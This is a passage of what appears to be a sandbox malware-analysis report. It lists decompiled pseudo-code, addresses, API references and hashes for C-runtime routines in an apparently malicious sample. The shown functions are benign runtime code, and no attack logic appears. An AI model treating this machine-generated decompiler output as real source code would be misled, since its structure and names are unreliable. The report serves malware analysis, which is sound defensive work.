                                                                                                                                                                                                                                                                            								__eflags = _t28;
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									L8:
                                                                                                                                                                                                                                                                            									_t11 = 0;
                                                                                                                                                                                                                                                                            									E003808F8(__eflags,  *0x40db70, 0);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									__eflags = E003808F8(__eflags,  *0x40db70, _t28);
                                                                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                                                                            										_t11 = _t28;
                                                                                                                                                                                                                                                                            										_t28 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										goto L8;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								E0037A8FB(_t28);
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					SetLastError(_t25);
                                                                                                                                                                                                                                                                            					return _t11;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x0037f64b
                                                                                                                                                                                                                                                                            0x0037f65e
                                                                                                                                                                                                                                                                            0x0037f665
                                                                                                                                                                                                                                                                            0x0037f668
                                                                                                                                                                                                                                                                            0x0037f66b
                                                                                                                                                                                                                                                                            0x0037f684
                                                                                                                                                                                                                                                                            0x0037f684
                                                                                                                                                                                                                                                                            0x0037f66d
                                                                                                                                                                                                                                                                            0x0037f66d
                                                                                                                                                                                                                                                                            0x0037f66f
                                                                                                                                                                                                                                                                            0x0037f679
                                                                                                                                                                                                                                                                            0x0037f67f
                                                                                                                                                                                                                                                                            0x0037f680
                                                                                                                                                                                                                                                                            0x0037f682
                                                                                                                                                                                                                                                                            0x0037f692
                                                                                                                                                                                                                                                                            0x0037f696
                                                                                                                                                                                                                                                                            0x0037f698
                                                                                                                                                                                                                                                                            0x0037f6ac
                                                                                                                                                                                                                                                                            0x0037f6ac
                                                                                                                                                                                                                                                                            0x0037f6b5
                                                                                                                                                                                                                                                                            0x0037f69a
                                                                                                                                                                                                                                                                            0x0037f6a8
                                                                                                                                                                                                                                                                            0x0037f6aa
                                                                                                                                                                                                                                                                            0x0037f6be
                                                                                                                                                                                                                                                                            0x0037f6c0
                                                                                                                                                                                                                                                                            0x0037f6c0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037f6aa
                                                                                                                                                                                                                                                                            0x0037f6c3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037f682
                                                                                                                                                                                                                                                                            0x0037f66f
                                                                                                                                                                                                                                                                            0x0037f6cb
                                                                                                                                                                                                                                                                            0x0037f6d5
                                                                                                                                                                                                                                                                            0x0037f64d
                                                                                                                                                                                                                                                                            0x0037f64f
                                                                                                                                                                                                                                                                            0x0037f64f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0037F63B,0037EA27), ref: 0037F652
                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0037F660
                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0037F679
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0037F63B,0037EA27), ref: 0037F6CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2d88c24878a7f54c3f2a73e617e7e40ea4bc13559326e5ce34a93a6938ad7e2b
                                                                                                                                                                                                                                                                            • Instruction ID: e26630af10ec690fdaf97ee93c8bf3e85ac341f40223ea099bc2c3a5d0f47fd2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d88c24878a7f54c3f2a73e617e7e40ea4bc13559326e5ce34a93a6938ad7e2b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38012472608711AFE77737B86C9582A3AA8FF01774722423BF128581F0EF655C4A9285
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                                                            			E00379E50(void* __ebx, void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr _t2;
                                                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t29 = __edx;
                                                                                                                                                                                                                                                                            				_t23 = __ecx;
                                                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                                                            				_t36 = GetLastError();
                                                                                                                                                                                                                                                                            				_t2 =  *0x40d4dc; // 0x2
                                                                                                                                                                                                                                                                            				_t42 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					_t3 = E0037A89E(_t23, 1, 0x364);
                                                                                                                                                                                                                                                                            					_t31 = _t3;
                                                                                                                                                                                                                                                                            					_pop(_t25);
                                                                                                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                                                                                                            						_t4 = E0037AB4E(_t25, _t36, __eflags,  *0x40d4dc, _t31);
                                                                                                                                                                                                                                                                            						__eflags = _t4;
                                                                                                                                                                                                                                                                            						if(_t4 != 0) {
                                                                                                                                                                                                                                                                            							E00379CC2(_t25, _t31, 0x40dd14);
                                                                                                                                                                                                                                                                            							E0037A8FB(0);
                                                                                                                                                                                                                                                                            							_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                                            							__eflags = _t31;
                                                                                                                                                                                                                                                                            							if(_t31 == 0) {
                                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_push(_t31);
                                                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_push(_t3);
                                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                                            						E0037A8FB();
                                                                                                                                                                                                                                                                            						_pop(_t25);
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						SetLastError(_t36);
                                                                                                                                                                                                                                                                            						E0037A85B(_t20, _t29, _t31, _t36);
                                                                                                                                                                                                                                                                            						asm("int3");
                                                                                                                                                                                                                                                                            						_push(_t20);
                                                                                                                                                                                                                                                                            						_push(_t36);
                                                                                                                                                                                                                                                                            						_push(_t31);
                                                                                                                                                                                                                                                                            						_t37 = GetLastError();
                                                                                                                                                                                                                                                                            						_t21 = 0;
                                                                                                                                                                                                                                                                            						_t9 =  *0x40d4dc; // 0x2
                                                                                                                                                                                                                                                                            						_t45 = _t9 - 0xffffffff;
                                                                                                                                                                                                                                                                            						if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                                                            							_t32 = E0037A89E(_t25, 1, 0x364);
                                                                                                                                                                                                                                                                            							_pop(_t27);
                                                                                                                                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                                                                                                                                            								_t11 = E0037AB4E(_t27, _t37, __eflags,  *0x40d4dc, _t32);
                                                                                                                                                                                                                                                                            								__eflags = _t11;
                                                                                                                                                                                                                                                                            								if(_t11 != 0) {
                                                                                                                                                                                                                                                                            									E00379CC2(_t27, _t32, 0x40dd14);
                                                                                                                                                                                                                                                                            									E0037A8FB(_t21);
                                                                                                                                                                                                                                                                            									__eflags = _t32;
                                                                                                                                                                                                                                                                            									if(_t32 != 0) {
                                                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										goto L18;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(_t32);
                                                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_push(_t21);
                                                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                                                            								E0037A8FB();
                                                                                                                                                                                                                                                                            								L18:
                                                                                                                                                                                                                                                                            								SetLastError(_t37);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t32 = E0037AAF8(_t25, _t37, _t45, _t9);
                                                                                                                                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                                                                                                                                            								L19:
                                                                                                                                                                                                                                                                            								SetLastError(_t37);
                                                                                                                                                                                                                                                                            								_t21 = _t32;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return _t21;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t31 = E0037AAF8(_t23, _t36, _t42, _t2);
                                                                                                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						SetLastError(_t36);
                                                                                                                                                                                                                                                                            						return _t31;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                                                            0x00379e50
                                                                                                                                                                                                                                                                            0x00379e50
                                                                                                                                                                                                                                                                            0x00379e50
                                                                                                                                                                                                                                                                            0x00379e5a
                                                                                                                                                                                                                                                                            0x00379e5c
                                                                                                                                                                                                                                                                            0x00379e61
                                                                                                                                                                                                                                                                            0x00379e64
                                                                                                                                                                                                                                                                            0x00379e72
                                                                                                                                                                                                                                                                            0x00379e79
                                                                                                                                                                                                                                                                            0x00379e7e
                                                                                                                                                                                                                                                                            0x00379e81
                                                                                                                                                                                                                                                                            0x00379e84
                                                                                                                                                                                                                                                                            0x00379e96
                                                                                                                                                                                                                                                                            0x00379e9b
                                                                                                                                                                                                                                                                            0x00379e9d
                                                                                                                                                                                                                                                                            0x00379ea8
                                                                                                                                                                                                                                                                            0x00379eaf
                                                                                                                                                                                                                                                                            0x00379eb4
                                                                                                                                                                                                                                                                            0x00379eb7
                                                                                                                                                                                                                                                                            0x00379eb9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379e9f
                                                                                                                                                                                                                                                                            0x00379e9f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379e9f
                                                                                                                                                                                                                                                                            0x00379e86
                                                                                                                                                                                                                                                                            0x00379e86
                                                                                                                                                                                                                                                                            0x00379e87
                                                                                                                                                                                                                                                                            0x00379e87
                                                                                                                                                                                                                                                                            0x00379e8c
                                                                                                                                                                                                                                                                            0x00379ec7
                                                                                                                                                                                                                                                                            0x00379ec8
                                                                                                                                                                                                                                                                            0x00379ece
                                                                                                                                                                                                                                                                            0x00379ed3
                                                                                                                                                                                                                                                                            0x00379ed6
                                                                                                                                                                                                                                                                            0x00379ed7
                                                                                                                                                                                                                                                                            0x00379ed8
                                                                                                                                                                                                                                                                            0x00379edf
                                                                                                                                                                                                                                                                            0x00379ee1
                                                                                                                                                                                                                                                                            0x00379ee3
                                                                                                                                                                                                                                                                            0x00379ee8
                                                                                                                                                                                                                                                                            0x00379eeb
                                                                                                                                                                                                                                                                            0x00379ef9
                                                                                                                                                                                                                                                                            0x00379f05
                                                                                                                                                                                                                                                                            0x00379f08
                                                                                                                                                                                                                                                                            0x00379f0b
                                                                                                                                                                                                                                                                            0x00379f1d
                                                                                                                                                                                                                                                                            0x00379f22
                                                                                                                                                                                                                                                                            0x00379f24
                                                                                                                                                                                                                                                                            0x00379f2f
                                                                                                                                                                                                                                                                            0x00379f35
                                                                                                                                                                                                                                                                            0x00379f3d
                                                                                                                                                                                                                                                                            0x00379f3f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379f26
                                                                                                                                                                                                                                                                            0x00379f26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379f26
                                                                                                                                                                                                                                                                            0x00379f0d
                                                                                                                                                                                                                                                                            0x00379f0d
                                                                                                                                                                                                                                                                            0x00379f0e
                                                                                                                                                                                                                                                                            0x00379f0e
                                                                                                                                                                                                                                                                            0x00379f41
                                                                                                                                                                                                                                                                            0x00379f42
                                                                                                                                                                                                                                                                            0x00379f42
                                                                                                                                                                                                                                                                            0x00379eed
                                                                                                                                                                                                                                                                            0x00379ef3
                                                                                                                                                                                                                                                                            0x00379ef7
                                                                                                                                                                                                                                                                            0x00379f4a
                                                                                                                                                                                                                                                                            0x00379f4b
                                                                                                                                                                                                                                                                            0x00379f51
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379ef7
                                                                                                                                                                                                                                                                            0x00379f58
                                                                                                                                                                                                                                                                            0x00379f58
                                                                                                                                                                                                                                                                            0x00379e66
                                                                                                                                                                                                                                                                            0x00379e6c
                                                                                                                                                                                                                                                                            0x00379e70
                                                                                                                                                                                                                                                                            0x00379ebb
                                                                                                                                                                                                                                                                            0x00379ebc
                                                                                                                                                                                                                                                                            0x00379ec6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00379e70

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,003760D1,?,?,?,00374DA8,?), ref: 00379E54
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379E87
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379EAF
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00379EBC
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00379EC8
                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00379ECE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1c2f3aa27084adf225d53dafcf814a1b940996730ee14ce986042fc65fdc4b3f
                                                                                                                                                                                                                                                                            • Instruction ID: 5e0caf44d5f216d908c44aaf15364f569e57bd6b273cf35ea7d7a69bcf5fbfe6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c2f3aa27084adf225d53dafcf814a1b940996730ee14ce986042fc65fdc4b3f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FF0F435500B017AC333A3646C0AF2F29598FC2760F21C226F45CBA791EE3D8C469363
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0037C403,0037A89D,?,0037C3A3,0037A89D,003CB500,0000000C,0037C4B6,0037A89D,00000002), ref: 0037C42E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0037C441
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0037C403,0037A89D,?,0037C3A3,0037A89D,003CB500,0000000C,0037C4B6,0037A89D,00000002,00000000), ref: 0037C464
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                            • Opcode ID: 6b93f11ca87d37831c7bcf65fa4c161d6c67c09b7c3faeadbee0cc06805a1564
                                                                                                                                                                                                                                                                            • Instruction ID: 484a30c9e41b09058e397133fa064c2530f4cee705743773095dddabca7ffea8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b93f11ca87d37831c7bcf65fa4c161d6c67c09b7c3faeadbee0cc06805a1564
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBF0C871900608BBDB139F91DC09BADBFB8EF04711F0140A9F909A6250DF385E44DB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                                                            			E0037A71E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				void* _v40;
                                                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				int _t46;
                                                                                                                                                                                                                                                                            				int _t53;
                                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                                            				int _t57;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                                                            				short* _t69;
                                                                                                                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                                                                                                                            				short* _t71;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t34 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                                            				E00376093(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                                            				_t57 = _a24;
                                                                                                                                                                                                                                                                            				if(_t57 == 0) {
                                                                                                                                                                                                                                                                            					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                                            					_t57 = _t53;
                                                                                                                                                                                                                                                                            					_a24 = _t53;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                                                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                                            				_v12 = _t40;
                                                                                                                                                                                                                                                                            				if(_t40 == 0) {
                                                                                                                                                                                                                                                                            					L15:
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return E0037DE3E(_v8 ^ _t70);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                                                                                                                                                            					_t69 = 0;
                                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                                            					if(_t69 != 0) {
                                                                                                                                                                                                                                                                            						E0037F290(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                                            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                                            						if(_t46 != 0) {
                                                                                                                                                                                                                                                                            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                                                            					E0037A83B(_t69);
                                                                                                                                                                                                                                                                            					goto L15;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                                                                                                                                                            				_t63 = _t55 + 8;
                                                                                                                                                                                                                                                                            				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					_t69 = E0037BF3C(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                                            					if(_t69 == 0) {
                                                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *_t69 = 0xdddd;
                                                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                                                            					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				E0037E490();
                                                                                                                                                                                                                                                                            				_t69 = _t71;
                                                                                                                                                                                                                                                                            				if(_t69 == 0) {
                                                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                                            				goto L9;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x0037a726
                                                                                                                                                                                                                                                                            0x0037a72d
                                                                                                                                                                                                                                                                            0x0037a739
                                                                                                                                                                                                                                                                            0x0037a73e
                                                                                                                                                                                                                                                                            0x0037a743
                                                                                                                                                                                                                                                                            0x0037a748
                                                                                                                                                                                                                                                                            0x0037a74b
                                                                                                                                                                                                                                                                            0x0037a74d
                                                                                                                                                                                                                                                                            0x0037a74d
                                                                                                                                                                                                                                                                            0x0037a752
                                                                                                                                                                                                                                                                            0x0037a76b
                                                                                                                                                                                                                                                                            0x0037a771
                                                                                                                                                                                                                                                                            0x0037a776
                                                                                                                                                                                                                                                                            0x0037a815
                                                                                                                                                                                                                                                                            0x0037a819
                                                                                                                                                                                                                                                                            0x0037a81e
                                                                                                                                                                                                                                                                            0x0037a81e
                                                                                                                                                                                                                                                                            0x0037a83a
                                                                                                                                                                                                                                                                            0x0037a83a
                                                                                                                                                                                                                                                                            0x0037a77c
                                                                                                                                                                                                                                                                            0x0037a784
                                                                                                                                                                                                                                                                            0x0037a788
                                                                                                                                                                                                                                                                            0x0037a7d4
                                                                                                                                                                                                                                                                            0x0037a7d6
                                                                                                                                                                                                                                                                            0x0037a7d8
                                                                                                                                                                                                                                                                            0x0037a7dd
                                                                                                                                                                                                                                                                            0x0037a7f4
                                                                                                                                                                                                                                                                            0x0037a7fc
                                                                                                                                                                                                                                                                            0x0037a80c
                                                                                                                                                                                                                                                                            0x0037a80c
                                                                                                                                                                                                                                                                            0x0037a7fc
                                                                                                                                                                                                                                                                            0x0037a80e
                                                                                                                                                                                                                                                                            0x0037a80f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a814
                                                                                                                                                                                                                                                                            0x0037a78f
                                                                                                                                                                                                                                                                            0x0037a791
                                                                                                                                                                                                                                                                            0x0037a793
                                                                                                                                                                                                                                                                            0x0037a79b
                                                                                                                                                                                                                                                                            0x0037a7b8
                                                                                                                                                                                                                                                                            0x0037a7c2
                                                                                                                                                                                                                                                                            0x0037a7c7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a7c9
                                                                                                                                                                                                                                                                            0x0037a7cf
                                                                                                                                                                                                                                                                            0x0037a7cf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a7cf
                                                                                                                                                                                                                                                                            0x0037a79f
                                                                                                                                                                                                                                                                            0x0037a7a3
                                                                                                                                                                                                                                                                            0x0037a7a8
                                                                                                                                                                                                                                                                            0x0037a7ac
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037a7ae
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?), ref: 0037A76B
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0037A7A3
